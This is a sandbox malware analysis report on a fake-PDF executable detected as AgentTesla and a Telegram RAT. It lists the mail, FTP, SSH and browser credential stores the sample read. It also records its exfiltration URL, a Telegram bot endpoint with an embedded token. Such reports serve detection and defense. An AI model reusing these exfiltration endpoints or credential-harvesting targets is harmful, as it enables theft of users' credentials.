                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected Telegram RAT
Source: Yara match | File source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
Yara detected AgentTesla
Source: Yara match | File source: 0.2.20220114080343434.pdf.exe.3edcc90.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.20220114080343434.pdf.exe.3e74280.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.20220114080343434.pdf.exe.3e74280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.20220114080343434.pdf.exe.3edcc90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 1496, type: MEMORYSTR

                      Remote Access Functionality:

Yara detected Telegram RAT (same Yara matches as listed under Stealing of Sensitive Information)
Yara detected AgentTesla (same Yara matches as listed under Stealing of Sensitive Information)

                      Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation 211; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection 312; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading 11; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 131; Process Injection 312; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 12; Software Packing 23
Credential Access: OS Credential Dumping 2; Input Capture 1; Credentials in Registry 1; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery 211; Process Discovery 2; Virtualization/Sandbox Evasion 131; Application Window Discovery 1; Remote System Discovery 1; System Information Discovery 114; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Email Collection 1; Input Capture 1; Archive Collected Data 11; Data from Local System 2; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Web Service 1; Encrypted Channel 11; Non-Application Layer Protocol 2; Application Layer Protocol 3; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

                      Behavior Graph

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
20220114080343434.pdf.exe | 100% | Joe Sandbox ML |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
8.0.RegSvcs.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
8.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
8.0.RegSvcs.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
8.0.RegSvcs.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
8.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
8.0.RegSvcs.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs


                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument | false | | high

                          URLs from Memory and Binaries

                                          http://www.carterandcone.comuy20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fonts.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.kr20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpfalse
                                              high
                                              http://www.sajatypeworks.coma20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPlease20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://xXcVm5kmD6Gyza.org(RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.fonts.comiv20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.urwpp.de20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.292550293.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cn20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286803625.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.carterandcone.como.20220114080343434.pdf.exe, 00000000.00000003.286962308.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sakkal.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.typography.net(20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.tiro.com5v20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designersr20220114080343434.pdf.exe, 00000000.00000003.292082396.0000000005CEF000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.020220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286760496.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286824795.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286816564.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286767765.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286924962.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286942039.0000000005D04000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://DynDns.comDynDNSRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmld20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.sajatypeworks.coms20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cnTC20220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://xXcVm5kmD6Gyza.orgRegSvcs.exe, 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.coma20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://en.w20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.ipify.org%$RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.carterandcone.coml20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.founder.com.cn/cn/20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlN20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/frere-jones.html20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers/cabarga.html20220114080343434.pdf.exe, 00000000.00000003.291923026.0000000005CEF000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn920220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.carterandcone.comn-u/20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.sandoll.co.krr-t20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers820220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/staff/dennis.htmNp20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295250238.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295200642.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.carterandcone.comesS20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.typography.netiv20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284128821.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.urwpp.dem20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://fontfabrik.com(20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                low
                                                                http://api.telegram.orgRegSvcs.exe, 00000008.00000002.557264398.0000000003712000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.com/designers/d20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.kru-hX20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.tiro.comic20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.micro.20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.urwpp.dec20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown

                                                                      Contacted IPs


                                                                      Public

IP: 149.154.167.220
Domain: api.telegram.org
Country: United Kingdom
ASN: 62041
ASN Name: TELEGRAMRU
Malicious: false

                                                                      Private

IP: 192.168.2.1

                                                                      General Information

                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                      Analysis ID:553218
                                                                      Start date:14.01.2022
                                                                      Start time:13:53:00
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 24s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:20220114080343434.pdf.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:24
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@1/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HDC Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: 20220114080343434.pdf.exe

                                                                      Simulations

                                                                      Behavior and APIs

Time: 13:54:02
Type: API Interceptor
Description: 1x Sleep call for process: 20220114080343434.pdf.exe modified

Time: 13:54:16
Type: API Interceptor
Description: 741x Sleep call for process: RegSvcs.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.log
Process: C:\Users\user\Desktop\20220114080343434.pdf.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1310
Entropy (8bit): 5.345651901398759
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x847mE4P:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzQ
MD5: A9EFF9253CAF99EC8665E41D736DDAED
SHA1: D95BB4ABC856D774DA4602A59DE252B4BF560530
SHA-256: DBC637B33F1F3CD1AB40AFED23F94C4571CA43621EBB52C5DC267DBDC52D4783
SHA-512: 96B67A84B750589BDB758224641065919F34BBF02BB286B9F5D566B48965A0E38FB88308B61351A6E11C46B76BFEC370FBC8B978A9F0F07A847567172D5CA5F3
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.224593030373487
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: 20220114080343434.pdf.exe
File size: 589824
MD5: cd9290d22bb18ced32a1b81814888382
SHA1: 83b1ce896dca71d611232fe4197cbe3993cccf64
SHA256: 3876b600bafaaaf0a580e3925b9851c1c82ea16b40fb6b2b127296a523cf86fd
SHA512: 1c2c1b126910aad08d6434ed65c49d10e24c3fa79463ec7829ebc6dc4f3601020edaa0d07e7a60c12faec39c557ae4ecafe5804ac324231ff8cf3f4d8d8e7b23
SSDEEP: 12288:SccK777777777777N7cPGR72wUjuf/R9nkIE9NciKpSj1kv6e:CK777777777777lcudvUjuX7S+8kv
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5O.a............................>.... ... ....@.. .......................`............@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x49143e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x61E14F35 [Fri Jan 14 10:23:49 2022 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
